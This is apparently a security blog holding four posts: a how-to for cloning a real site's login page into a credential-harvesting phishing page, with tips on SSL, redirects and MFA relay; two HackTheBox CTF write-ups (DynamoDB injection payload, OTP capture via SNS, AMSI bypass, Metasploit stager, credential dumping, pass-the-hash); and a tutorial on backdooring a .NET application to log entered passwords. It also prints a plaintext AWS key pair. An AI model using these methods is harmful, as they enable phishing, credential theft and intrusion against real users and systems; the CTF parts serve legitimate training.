Creating a credential harvesting (phishing) page

I’ve been meaning to write-up my method of creating a credential harvesting page and it’s been a while since I’ve posted anything, so here we go.

This method is probably considered pretty basic to some because it’s literally just copying the HTML for a site and editing it a little to point somewhere else, but I try to follow the KISS method when possible and it’s a good base for building additional complexity onto later.

In this post I’m going to go over the following points and then provide a few ideas on improving the final product if it were intended to be used in an actual engagement.

  • Finding a target/login page
  • Cloning the target site
  • Modifying the site to point to the attacker’s server

The overall goal of this is to have a site that looks identical to the target’s legitimate login page, will store/send any credentials submitted to it to the attacker’s server, and then re-direct back to the legitimate page. The steps I’m going to show are by no means the best/most efficient/most effective way of creating a credential harvester, but I still think it’s useful to see one way it can be done to understand how an attacker may approach the subject.

Finding a target

The first thing we need before we can begin creating our phishing page is to find a target site, ideally one with a login page users of the site will recognize. An obvious candidate would be a Microsoft login like the one seen below, but I’m going to avoid that for this example due to the fact that there are multiple steps/pages in the user submitting their username and password which comes with extra logic/code that needs to be implemented. It’s completely doable, but I want to use a simpler example to begin with.

For this example, I’m going to use the login page for TryHackMe as seen below. It’s a standard login with a CAPTCHA, logos, and other assets that are loaded, along with the form for both username and password.

Cloning the target site

As modern websites rely heavily on JavaScript to render sites once you visit them, my personal preference is to simply “View Source” for the target page and copy/paste all of the content into a new file we’re creating to mimic it. This will generally give us a large HTML file with a lot of individual JavaScript and CSS files being loaded from either the same site or from related CDNs. Once this is done and without changing any of the source code for now, we get the page below when opening it in our browser. For reference, the original site is on the left, with the copied version on the right.

This actually looks much closer to the original than many sites would without making any modifications, but there are still some things we can notice that are off in the cloned version. The Google CAPTCHA window is displaying an error because it’s expecting to be loaded on a specific domain, which we won’t be matching. Second, the Google logo on the “Sign in with Google” button is not displaying properly, causing the name of the file to be displayed instead. We’ll fix the CAPTCHA eventually, but the first and easier step is to address the assets not loading correctly. In the image below, we can see some of the assets are being loaded using the full absolute URL of wherever the file is stored, whereas others are using a URL relative to what the current site would be (in this case, tryhackme.com).

The fix for this is to simply replace any relative URLs with their absolute versions. This means changing something like “/assets/page/pace.js” to “https://tryhackme.com/assets/pace/pace.js”. Doing this for the rest of the relative URLs in the source, saving, and reloading gives us the page seen below where the Google image is not rendering correctly, though we still have an issue with the CAPTCHA box. You can save some time changing these URLs using regex patterns in your text editor of choice, but I’ll leave that to the reader for now.

Now that we have all visible assets displaying correctly, we can address the CAPTCHA error that will undoubtedly draw a user’s attention. For simplicity’s sake in this post, we’re just going to remove it as most users will likely not even notice if it’s gone or just assume they’re not required to do it again because of a saved session. This can be done by either removing the div seen below referencing the Google CAPTCHA or by erasing the data-sitekey parameter. Both actions will serve the same purpose of removing the CAPTCHA from the rendered page, as seen in the next screenshot.

Modifying the site to point to the attacker’s server

Great, now we have a clone that is more or less identical to the original, but if a user logs into it the site nothing will happen because the form is still set to send a POST request to /login of the original site. This is seen below where the form is defined with the “action” parameter set to the endpoint the form’s data is supposed to be sent to.

What would happen if we changed this parameter to point to a server we control with a listener running on port 80 to catch any HTTP requests? As seen below, when the action parameter has been changed and a user tries to login the form data is sent to our server with both the username and password being visible.

While this is working correctly, there are still a few issues that might deter a user from actually submitting their credentials to the site. As seen below, when the page loads now the form displays a message that the connection is not secure because our action parameter now points to a URL using HTTP instead of HTTPS. Now, in a real-world scenario many users may not even notice or care about this warning, but it’s a good idea to try and make the clone be as realistic as possible.

This could be easily solved by using a valid SSL certificate from a site like LetsEncrypt for whatever domain name you end up using to host this site. I’m not going to demo that in this post, but the only changes to the source code would be switching the action to HTTPS, along with configuring your web server of choice to use your new certificate. This entire process is relatively straightforward and there are many guides, like this one from DigitalOcean that can be used as a reference.

Potential Improvements

At this point, our clone looks basically identical to the original and is successfully submitting data to our server where it can be logged for future use. However, this is a very basic credential harvesting page that savy users may recognize as not behaving as expected. To this point, there are a number of things we could add to improve the chances of success, apart from simply adding SSL as described above.

  • At the moment, a login attempt will eventually timeout and display an error that the page it was submitting data to didn’t respond as expected or just doesn’t exist at all. There are two ways to address this, though I usually prefer the latter. First, we could create another page to host on our server that will send a response to the login attempt and do something else afterward (i.e. Display an error, load a different page, etc.). Alternatively, Apache (or other web servers) could return a Location header that points the user’s browser back to the legitimate login page on any login attempt. I generally prefer the second option because the longer a user is looking at a phishing page the more likely they are to start noticing differences or that the URL isn’t quite right and this redirect will ensure they’re back where they expected to be, even if their supposed login attempt didn’t work the first try.
  • Many modern applications implement some sort of MFA and a set of valid credentials just aren’t enough anymore to gain access to the target service. There are existing open-source tools that already help with this, like evilginx2, but it’s also possible to get around this on your own with a few additions to the source code and short Python script that is run from your server whenever a user tries to login. The idea is that a user submits their username and password, the attacker’s server extracts the credentials and submits them in the background to the legitimate service/application, the server then loads a second page that mimics what the site looks like when it is expecting an MFA code or response. If the user then submits the code to the cloned site, the script on the attacker’s server then retrieves it and submits it as well to the legitimate site. This is a good bit more complicated, but if all information is submitted successfully, a login to the real target can be automated and a cookie retrieved that will grant access to the site without the need for credentials or MFA codes.

That’s all for now, but I hope this was educational or useful in some way. I plan to come back to this in the future and show what some of these improvements would look like when implemented, so hopefully I get around to that sooner rather than later.

HTB Business CTF 2022 – Trade (Cloud)

Overview

The Trade machine was another challenge included in the HackTheBox Business CTF 2022 and was rated as an easy Cloud challenge. The only information provided was the IP of the initial machine and the description below.

With increasing breaches there has been equal increased demand for exploits and compromised hosts. Dark APT group has released an online store to sell such digital equipment. Being part of defense operations can you help disrupting their service ?

Initial Nmap

The initial nmap scan shows 3 ports open from the top 1000: SSH, HTTP, and Subversion.

Nmap scan report for 10.129.186.201
Host is up (0.089s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http     Apache httpd 2.4.41
|_http-title: Monkey Backdoorz
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/2.1.2 Python/3.8.10
3690/tcp open  svnserve Subversion
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

When visiting the IP in the browser, we’re presented with a login page for “Monkey Backdoorz”. We don’t have credentials at the moment and the general default credentials of admin:admin, etc. do not seem to work. I began a directory brute-force with gobuster and moved on to investigating the Subversion service identified by nmap.

Subversion

Apache Subversion is a version control software, similar to Git, that is open source. According to Google the biggest different is that Git version control is distributed, while SVN is centralized.

For reference, most of the commands I’m using can be found here as a general methodology of investigating Subversion.

We can begin investigating the SVN instance by using a few commands to get an idea of what is stored there. First, we can list the repositories available, which shows only one named store. We can then checkout the store repository and automatically sync any files kept there to our local machine. In this case, this downloads a README and two Python scripts.

$ svn ls svn://10.129.186.194                                                                                                                                                                                             
store/


$ svn checkout svn://10.129.186.194                                                                                                                                                                                             
A    store
A    store/README.md
A    store/dynamo.py
A    store/sns.py
Checked out revision 5.

Sns.py appears to be a script used to interact with instaces of an AWS S3 bucket and SNS (Simple Notification Service) located at http://cloud.htb. However, the script seems to have had the AWS secrets removed.

Dynamo.py is another script interacting with an AWS service, this time to create/update a DynamoDB instance. The credentials below for the user ‘marcus’ were found hard-coded in the script.

client.put_item(TableName='users',
    Item={
        'username': {
            'S': 'marcus'
        },
        'password': {
            'S': 'REDACTED'
        },
    }

Going back to the web page found earlier, they allow us to login successfully, but move us next to an OTP prompt. We don’t know how the OTP is generated yet, so I went back to investigating SVN further.

As Subversion works like Git, that means we can view the log of commits to this particular repository and potentially view the older versions. As seen below, there are 5 revisions available for this repository, with r5 being the latest and the one we downloaded.

$ svn log svn://10.129.186.194                                                                                                                                                                                              
------------------------------------------------------------------------
r5 | root | 2022-06-14 02:59:42 -0700 (Tue, 14 Jun 2022) | 1 line

Adding database
------------------------------------------------------------------------
r4 | root | 2022-06-14 02:59:23 -0700 (Tue, 14 Jun 2022) | 1 line

Updating Notifications
------------------------------------------------------------------------
r3 | root | 2022-06-14 02:59:12 -0700 (Tue, 14 Jun 2022) | 1 line

Updating Notifications
------------------------------------------------------------------------
r2 | root | 2022-06-14 02:58:26 -0700 (Tue, 14 Jun 2022) | 1 line

Adding Notifications
------------------------------------------------------------------------
r1 | root | 2022-06-14 02:49:17 -0700 (Tue, 14 Jun 2022) | 1 line

Initializing repo
------------------------------------------------------------------------

Changing to a previous revision (revision 2) shows an older version of sns.py with the AWS secrets still included.

$ svn checkout svn://10.129.186.201 -r 2                                                                                                                                                                                    

   C store
   A store/README.md
   A store/sns.py
Checked out revision 2.

Old revision of sns.py

region = 'us-east-2'
max_threads = os.environ['THREADS']
log_time = os.environ['LOG_TIME']
access_key = 'AKIA5M34BDN8GCJGRFFB'
secret_access_key_id = 'cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn'

These can be setup in the AWS CLI by running aws configure and entering the appropriate values when prompted (access key, secret access key, region, etc.).

# Install awscli packages
$ sudo apt-get install awscli

# Configure awscli to use the identified secrets
$ aws configure

AWS CLI

With the AWS CLI setup with the appropriate secrets, we need to investigate the services being used by the application: S3 and SNS. Unfortunately, our secrets don’t appear to have permission to enumerate S3 buckets, so I moved on to SNS.

After some trial and error, the command below enumerates the available topics in SNS (Simple Notification Service) within AWS. --endpoint-url needs to specify the HTB host as it is running a local instance of the AWS services. I just added the IP of the device to my /etc/hosts file and pointed it to cloud.htb in this case to match the endpoint seen in the Python scripts.

$ aws --endpoint-url=http://cloud.htb sns list-topics                                                                                                                                                                       
{
    "Topics": [
        {
            "TopicArn": "arn:aws:sns:us-east-2:000000000000:otp"
        }
    ]
}

Reading through the documentation, we can subscribe to the topic using the command below and specifying the HTTP protocol along with our attacking IP. This way, whenever a notification is sent it will come over port 80 to our machine. We can monitor for this connection with netcat on port 80 and see any requests that come in.

$ aws --endpoint-url=http://cloud.htb sns subscribe --topic-arn "arn:aws:sns:us-east-2:000000000000:otp" --protocol http --notification-endpoint http://10.10.14.2
{
    "SubscriptionArn": "arn:aws:sns:us-east-2:000000000000:otp:47ceda90-0699-4142-90b7-acad806a5db6"
}

If we have netcat listening when this subscription is submitted, we get a confirmation message from the server for the new subscription.

$ nc -lvnp 80                                                                                                                                                                                                                 

listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.186.201] 38974
POST / HTTP/1.1
Host: 10.10.14.2
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: text/plain
x-amz-sns-message-type: SubscriptionConfirmation
x-amz-sns-topic-arn: arn:aws:sns:us-east-2:000000000000:otp
x-amz-sns-subscription-arn: arn:aws:sns:us-east-2:000000000000:otp:9a21091c-7dcc-4349-9146-609d063997ee
Content-Length: 831

{"Type": "SubscriptionConfirmation", "MessageId": "cbda25dd-1fcf-4c08-8b0a-555d6ecc4d3f", "TopicArn": "arn:aws:sns:us-east-2:000000000000:otp", "Message": "You have chosen to subscribe to the topic arn:aws:sns:us-east-2:000000000000:otp.\nTo confirm the subscription, visit the SubscribeURL included in this message.", "Timestamp": "2022-07-18T18:35:11.625Z", "SignatureVersion": "1", "Signature": "EXAMPLEpH+..", "SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-0000000000000000000000.pem", "SubscribeURL": "http://localhost:4566/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-2:000000000000:otp&Token=c348e025", "Token": "c348e025", "UnsubscribeURL": "http://localhost:4566/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-east-2:000000000000:otp:9a21091c-7dcc-4349-9146-609d063997ee"}

Now, when logging into the web app with marcus’ credentials and we have netcat running on port 80, a successful login on the web app sends the notification below, which includes an OTP in the section I have isolated.

$ nc -lvnp 80                                                                                                                                                                                                                   
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.186.194] 47912
POST / HTTP/1.1
Host: 10.10.14.2
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: text/plain
x-amz-sns-message-type: Notification
x-amz-sns-topic-arn: arn:aws:sns:us-east-2:000000000000:otp
x-amz-sns-subscription-arn: arn:aws:sns:us-east-2:000000000000:otp:47ceda90-0699-4142-90b7-acad806a5db6
Content-Length: 529

{"Type": "Notification", "MessageId": "d361f33c-6566-458f-862e-a137e24f4657", "TopicArn": "arn:aws:sns:us-east-2:000000000000:otp", "Message": "

{\"otp\": \"74918031\"}", <----- OTP Number

"Timestamp": "2022-07-17T23:38:26.886Z", "SignatureVersion": "1", "Signature": "EXAMPLEpH+..", "SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-0000000000000000000000.pem", "UnsubscribeURL": "http://localhost:4566/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-east-2:000000000000:otp:47ceda90-0699-4142-90b7-acad806a5db6"}

Using this number for the OTP prompt allows us to successfully login to the website.

The website itself appears to be a marketplace for access to various companies, but the cart functionality doesn’t seem to be fully functional.

DynamoDB Injection

At the bottom of the page is a link to a search page for more exploits.

Visiting this page gives a pretty generic search box and results message when entering regular text.

However, based on the script found earlier in SVN, it appears the website is using a DynamoDB database, which is a proprietary NoSQL database service used by Amazon.

After some fuzzing on the search parameter, a few characters cause a different result to be displayed. Below shows the result when the string zzzzz” is entered, displaying a JSONDecodeError and the query being sent to the database. A few Google searches on this error and the variables being used in the query confirms the search is most likely connected to a DynamoDB instance that our input is being directly passed to.

After some research on DynamoDB injections, I found this article discussing ways to exploit them and how they work. The important part is quoted below:

With String attributes, comparison gets tricky, as comparison depends on the ASCII lexical ordering of strings, therefore, if you compare string values against another string with lower lexical ordering like * or a string with whitespace its likely to be always greater than or less than the queried string.

I also found this useful website showing the ASCII sort order, with the first character being a space.

This effectively means if we can inject a string comparison against something like a whitespace character then it will function the same as the usual “OR 1=1” used in other common SQL injections and return every item from the database. With some trial and error, our full query eventually ends up looking like the json data below when expanded. This takes the original query seen in the error message and adds a second portion where we are doing a second comparison using greater than (GT) against the space character. This will result in a true response for every other ASCII character, essentially returning everything.

{
    "servername": 
    {
        "ComparisonOperator": "EQ","AttributeValueList": [
                {
                    "S": "START_OF_PAYLOAD"
                }
            ]
    },
    "servername": 
    {
        "ComparisonOperator": "GT","AttributeValueList": [
                {
                    "S": " "
                }
            ]
    }
}

When compressed to one line and the rest of the query removed (including the final "}]}} added by the server), we get the payload below (there is a space at the end, though it’s not easy to see).

START_OF_PAYLOAD"}]},"servername":{"ComparisonOperator": "GT","AttributeValueList": [{"S": " 

When this payload is submitted, the injection appears to be successful as the results include everything in the database. In this case, this is a list of servers, usernames, passwords, and shell locations.

The list of usernames/passwords can be taken and tried against the SSH service that was seen listening on the server initially. Eventually, we discover the credentials for Mario are valid and allow us to log in.

The flag.txt can be found in mario’s home directory.

HTB Business CTF 2022 – Commercial (FullPwn)

Overview

The Commercial machine was a challenge included in the HackTheBox Business CTF 2022 over the weekend and was rated as hard difficulty. The only information provided was the IP of the initial machine and the description below.

We have identified a dark net market by indexing the web and searching for favicons that belong to similar marketplaces. You are tasked with breaking into this marketplace and taking it down.

Initial Nmap Scan

The initial nmap scan below shows 4 ports open out of the top 1000 automatically scanned. The banners tell us it is a Windows machine (though with OpenSSH running), but the services available are an odd combination either way. The SSL cert information identified for the HTTPS service leaks the hostname of the box/IP/domain as commercial.htb.

$ sudo nmap -sC -sV 10.129.227.235 -v

Nmap scan report for commercial.htb (10.129.227.235)                                                                                                                                                                          [6/1341]
Host is up (0.084s latency).                                                                                       
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION                      
22/tcp  open  ssh        OpenSSH for_Windows_8.1 (protocol 2.0)                                                                                                                                                                       
| ssh-hostkey: 
|   3072 ee:69:a0:e8:d7:43:6a:40:99:c6:16:0c:43:d3:d0:df (RSA)
|   256 73:95:19:f7:ac:36:3c:f9:78:6b:27:c6:b9:cb:c2:83 (ECDSA)                                                                                                                                                                       
|_  256 ec:2c:11:ab:ba:5e:30:4e:6d:b9:65:6b:ad:6d:39:e4 (ED25519)
135/tcp open  msrpc      Microsoft Windows RPC
443/tcp open  ssl/http   Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2022-07-18T19:02:38+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=commercial.htb
| Subject Alternative Name: DNS:commercial.htb
| Issuer: commonName=commercial.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-10T21:15:25
| Not valid after:  2023-07-10T21:35:25
| MD5:   6aac 8f67 aa3e b943 6e94 987b ee75 ff91
|_SHA-1: c6fc 3014 4e1d d2d4 78c8 09e3 2c94 96b4 80c2 e2dd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Monkey Store
|_http-favicon: Unknown favicon MD5: 0715D95B164104D2406FE35DC990AFDA
593/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User Flag

HTTPS

Visiting the IP in the browser returns an SSL error as the certificate appears to be for commercial.htb instead of the specific IP.

However, when accepting the risk and continuing we’re presented with a 404 error that the page cannot be found. This appears to be due to the server expecting the name commercial.htb specifically rather than the IP address. After updating my /etc/hosts file to point the IP to commercial.htb and reloading the page, it loads successfully and we’re given the home page for “Monkey Store”.

The message below is included on the page mentioning that all links were taken down previously and some functionality is still down. This is confirmed when clicking around the home/market pages where nothing seems to be interactive and there is no way to add items to a cart or login (though I haven’t brute-forced directories/page at this point).

Update 15-07-2022:

We are back up and running. The old link was unfortunately
seized and taken down by ??????. Parts of this website are
still under development. Registrations are currently down.
Only our most trusted vendors and customers can access the
store. The issue will be resolved very soon. A lot of exit
nodes are being taken down by ??????. Be vigilant.
~ MB

Update 16-03-2020:

Error........We are deleting all of the available listings.
Not for ever.  Until it is safe for our vendors and buyers.
It is very vital that you stay away from this market place.
Going away for some time. They are close. Hide your tracks.
Most of our servers have been taken down. This is the last.
Above all do not access the City Market. It is compromised.
~ MB

Normally, I would move on to attempting to brute force directories with gobuster or investigating the web app further, but in this case I noticed a considerable amount of files being loaded in the Firefox DevTools whenever a page was requested. The vast majority appear to be initiated by the file blazor.webassembly.js. Blazor itself is a C# framework that is used to build interactive web apps with .NET.

In my research, I found this video below that discusses how Blazor WebAssembly applications can be exploited if the project’s DLLs are visible when the application loads (as seen above). As we can see the list of DLLs loaded by the app, we can download any of them individually and inspect them with an application like DNSpy or ILSpy that will allow the .NET code to be decompiled. Many of the DLLs appear to be related to Microsoft packages, but “Commercial.Client.dll” and “Commercial.Shared.dll” appear to be associated with the specific project, so those are our first target.

Decompiling Blazor DLLs

I downloaded both files mentioned above and opened then in the DNSpy application which, as seen below, was able to successfully open them. I began with “Commercial.Shared.dll” for no particular reason, but it ended up being the more interesting file either way.

Drilling down into the runspace and functions of the application reveals hardcoded credentials for the user Timothy.Price that appears to be used in a SQL connection string included for the application to function.

Using these credentials against the SSH service that was identified in the initial scan successfully logs us in as timothy.price and shows us the hostname of this machine is CMF-WKS001.

The user.txt flag can then be found on this user’s desktop.

Privilege Escalation to Richard.Cartwright

Before moving any further, I ran ipconfig to get an idea of our network interfaces and the only active one we’re shown is for the IP 172.16.22.2, which means there is a NAT involved somewhere that routes the 10.x.x.x address we originally used to this host.

Event Log Reader Group

Checking the user’s permissions shows he is a member of the “Event Log Readers” group, which is non-standard that allows the group members read access to any event log.

Initial checks using PowerShell show there are 7 different logs we can read, though only 3 appear to have data available. Windows PowerShell specifically sounds interesting as a first place to check.

From here, I used the command below to enumerate the PowerShell logs, which was a little tedious as it retrieves every log in this category, but one stood out eventually when scrolling through as including a base64-encoded command.

Get-EventLog -LogName "Windows PowerShell"

This encoded PowerShell commands decodes into the command below, which includes credentials for the user richard.cartwright.

$passwd = ConvertTo-SecureString "REDACTED" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential ("commercial\richard.cartwright", $passwd)

Moving back to SSH again, we’re able to successfully log in as richard.cartwright with these new credentials.

2nd Privilege Escalation to Local Admin

Unfortunately, Richard doesn’t seem to have anything very interesting in his home directory. Checking this user’s permissions, we can see he is a member of a custom domain group named “IT_Staff”.

At this point, Bloodhound could be run to gather domain information and plot out the same attack path I’m going to use, but I had some trouble with my SSH session not running Bloodhound correctly in PowerShell and the executable being detected by Windows Defender. I didn’t feel like putting a lot of effort into obfuscating the script past changing function names, so I moved on to using PowerView instead for domain recon. Below I’m retrieving the script from my machine and running the Get-Domain command to confirm the script was loaded correctly.

NOTE: Before I load any script into a PowerShell session I am running an AMSI bypass to ensure the scripts function correctly without Defender/AMSI stopping them. There are various bypasses found around the internet with a good collection at https://amsi.fail/, though several at this site are detected as malicious nowadays if used as is.

Using powerview to investigate the “IT_Staff” group, we can see Richard is the only member.

Get-DomainGroupMembers -Identify "IT_Staff" -domain commercial.htb

This doesn’t necessarily give us much more information on what the group can do so I ran the script PrivEscCheck.ps1 to perform a variety of checks for local misconfigurations that would allow us to elevate privileges locally, if not in the domain. This script performs many of the same checks as tools like SeatBelt and PowerUp.

Invoke-PrivescCheck -Report check -Force html -Extended

The command above outputs the results to an HTML file that can be downloaded from the machine for easier reference, but I noticed during the execution that one check showed LAPS (Local Administrator Password Solution) was enabled on this machine.

With LAPS enabled, we can use the LAPSToolkit to help identify which groups/users potentially have access to read the LAPS password.

As seen in the image above, the IT_Staff group we are a member of happens to have permission to read the LAPS passwords. The same LAPSToolkit script can then be used to retrieve any LAPS passwords set for machines in the domain. This gives us the administrator password for the CMF-WKS001 machine, which is what we’re currently working on. This also shows us there are two other computers in the commercial.htb domain, one of which appears to be the domain controller.

Taking this password and going back to SSH one more time shows the credentials are valid and allow us to log in as the local administrator of the machine.

Accessing the Domain Controller

Though there are multiple users and home directories on the machine, there is no root flag to be found. In this case, given there are multiple machines in the domain, the root flag is likely on the domain controller seen earlier in our enumeration. I used Metasploit to help make post-exploitation easier and opted for the multi/script/web_delivery module to deliver the initial payload through a PowerShell command using the configuration below.

After it is run, this module starts a web server and produces a PowerShell command to be run on the target that will call back and retrieve the stager for the meterpreter payload. Running this command in our SSH session as the local administrator successfully gives us a new session in Metasploit.

As we’re the local administrator, we should have the appropriate access to dump credentials from the device. hashdump can be used to dump the local SAM database, but we want to gather domain credentials as well so I chose the kiwi module which includes functionality from Mimikatz. The commands below will elevate our session from administrator to SYSTEM and then load the kiwi module.

# Elevate admin session to NT Authority\SYSTEM.  This may fail due to AV detection
meterpreter > getsystem
# Load the kiwi module for dumping credentials
meterpreter > load kiwi

Finally, the creds_all command can be used to dump all available credentials from the device, domain and otherwise. As seen below, this includes the hash for the Administrator account for the commercial.htb domain, which is by default a domain admin.

Now that we have a domain admin’s NTLM hash, we could potentially use it to access the domain controller identified earlier. The problem is the DC is not reachable from our “public” IP, only from the internal subnet the workstation is on. There are several ways to solve this, but I chose to continue with Metasploit and use its routing/proxy functionality to tunnel traffic from my system through the active meterpreter session.

# Add a route in metasploit to direct any traffic to the 172.16.22.0/24 subnet through the active session
route add 172.16.22.0/24 <session ID>

# Start the socks_proxy module to allow proxychains to redirect traffic to the session
use auxiliary/server/socks_proxy
run -j

With the route and proxy running in Metasploit, proxychains can be used to route the traffic of normal Linux tools through the current meterpreter session. The configuration file at /etc/proxychains.conf (or /etc/proxychains4.conf) may need to be modified to match the port used in the socks_proxy module, but mine are both currently using port 1080.

By prepending proxychains to the impacket-wmiexec command below, the traffic will be sent through the metasploit session and to the domain controller successfully. As we are able to reach the domain controller and have valid credentials for the domain administrator account, this provides us with a semi-interactive shell on CMD-SRVDC01.

NOTE: Other impacket tools like psexec or smbexec could also be used for this step, but I’ve found them more likely to be detected and stopped by AV.

Using this shell to navigate to the administrator’s desktop finds the root.txt file and the 2nd flag.

Backdooring a .NET application with dnSpy

Intro

I haven’t written anything in a while because I’ve been going through various trainings/courses, but I want to start getting back into the habit of it, so today I’m going to talk about the process of adding a backdoor to a .NET application. Given how popular C#/.NET is in the world today, this seems like a good topic.

As a quick overview, when a developer creates an application written in C#/.NET and compiles it, the compiler generates a file that contains what’s known as Intermediate Level code (IL code). This IL code is a higher level machine language than the usual assembly language used by the CPU, such as instructions like jmp, push eax, pop ebx, etc. The useful part about this in our case is that a decompiler can reconstruct what it thinks the original code looked like much easier from IL code. It will not be exactly the same as the original, but will usually be close enough that you won’t notice much of a difference.

As an example of what this looks like, I created a simple C# Windows Forms application in Visual Studio that displays a login prompt and prints a message on submission for whether or not the password was correct.

Basic Windows Forms Application
Invalid password submission
Valid password submission

This is a pretty simple example that just checks whether the string in the text box is equal to a pre-defined string in the code and updates the label text accordingly. For the next step, I just compiled the solution in Visual Studio and copied the EXE it outputs to the desktop.

Application properties

The properties shown here don’t give away too much information about the application, but using the Linux ‘file’ command against it provides something a little more useful. This output tells us it is a 64-bit compiled executable and, most importantly, appears to be written in .NET.

Linux file information for .NET Assembly

For reference, the next image is what most other Windows executables look like when viewed with the file command. In this case, I’m using the standard calc.exe available in every version of Windows.

Linux file information for normal Windows binary

Decompiling the application

Now we can get to the interesting part of decompiling the application. To do this I’m going to use the dnSpy tool found here. The repo has been archived at this point, but still works perfectly fine for everything we need to do. I’m not going to cover all of the useful features of dnSpy, of which there are a lot, but only those relevant to this topic. After downloading the last release and unzipping the contents, I can launch the executable and be greeted by the screen below.

Initial window in dnSpy on first load

On the first launch it loads dnSpy.dll and a few other assemblies related to it, but we don’t need those for now and can use the File -> Close All option to remove everything currently loaded.

Closing all current files in dnSpy

Now that we have a blank slate, we can load the target executable, in this case ExampleFormsApp.exe. This can be done by going through File -> Open -> Choose the target file. Once opened, it will show up in the Assembly Explorer along with an associated library or two. We can also see some of the decompiled code on the right hand side when selecting the ExampleFormsApp option in the left-hand pane.

Assembly loaded in dnSpy and decompiled code

From here, we can drill down into the target application until we can see the namespace in use (ExampleFormsApp) and the two classes identified in the application (Form1 and Program). Selecting the ‘Program’ class decompiles the associated code and displays it in the right window, allowing us to see the Main() function for this class. This expanded selection also gives us a list of functions and variables found in this class in the explorer pane, although Main appears to be the only one in this case.

Viewing “Program” class in ExampleFormsApp.exe

This class doesn’t seem to have much information in it, so let’s try the other one, Form1.

Viewing “Form1” class in ExampleFormsApp.exe

Form1 appears to have more going on. At first glance in the assembly explorer we can see several functions and variables displayed and the decompiled code also looks to have more functionality with functions defining actions to take when buttons in the form are clicked. We can also see the simple check performed in the passwordSubmitButton_Click function against the password entered in the form and how it compares the value against the string “supersecret”.

To re-iterate my earlier point that dnSpy doesn’t reproduce the exact same code as the original application, below is the original code I wrote for the same function. The logic is the same and produces the same results, but dnSpy formats the code differently because it is essentially guessing what the original looked like.

Logic to check submitted password in Example App

Editing the decompiled code and recompiling new binary

Now, what if I wanted to make a change to the application without needing to load everything back into Visual Studio and re-compile it? Luckily for us, dnSpy allows you to edit decompiled applications in place and re-compile them back into a new binary. As an example, I’m going to change the password the application is looking for to “hacked” and re-compile the code. To do this I’ll right-click anywhere in the decompiled code window and choose “Edit Class (C#)…”. You could also choose to edit a specific method instead of an entire class, but I’m using the whole class in this case.

dnSpy option to edit existing class of opened .NET file

This opens a new window where we can make direct changes to the code of the decompiled class. I make a single change to the string being checked and then choose compile in the bottom-right.

Editing Form1 class code

This saves our entry and brings us back to the original decompiled code window where the string “supersecret” has been replaced with “hacked”. Lastly, to re-compile our updated code, we choose File -> Save Module.

dnSpy option to save current module as new file

This option opens a new screen with a few options and the filename we want to save the binary to. I’m choosing to save it to “ExampleFormsApp-edited.exe” rather than overwriting the original.

dnSpy options to save file

This gives me two applications on the desktop now, the original and the edited version.

Modified version of ExampleFormsApp saved to desktop

Launching the edited application produces the same GUI window as before with a password prompt. However, if I try using the password “supersecret”, we get an invalid message this time. Whereas if I use the password “hacked”, we get the success message.

Modified version of ExampleFormsApp after changing password string
Showing new password is accepted

Other ideas when editing the application

This example shows how easy it is to edit and re-compile a .NET application, but it’s a pretty simple modification. What if the application was more complex and didn’t have a hard-coded string the password was being checked against? We could just edit out the password check altogether so that it returns a success no matter what. In this case I’ve removed the entire if/else block that validates the entered string is correct so that the application displays a success every time the button is clicked.

Removing the logic to validate password

This results in an application where the entered password doesn’t matter at all and could even be blank.

Showing an empty password is accepted

This is cool and all, but what if the password is used to somehow encrypt information within the application and you need the correct one to decrypt it correctly? Bypassing the initial authentication won’t matter if the information still can’t be decrypted correctly. What if we added a keylogging functionality to the original application to make it save the password being entered where we can view it later? The image below is the code I added to do just that. I also needed to add another using statement at the top for “using System.IO;” as the functions I use come from that namespace.

Code added to log submitted password to file

This code does a few things:

  • Defines the path to the log file we want to use
  • Checks if the file already exists
    • If it doesn’t exist, create it and add the submitted password to the file
    • If it does exist, append the submitted password to the file

Recompiling the application one more time and launching gives the same GUI we expect that is looking for the string “supersecret” as the password again. However, we can also see a new file is created on the desktop after submitting the first password.

Password accepted and log file created

Viewing the contents of the file show the first invalid login attempt I made, followed by the correct one. There could be more checks in the code to try and only write the password when it is correct, but this example still demonstrates the capabilities we have with .NET applications.

Contents of the log file created by application

Closing and other potential ideas

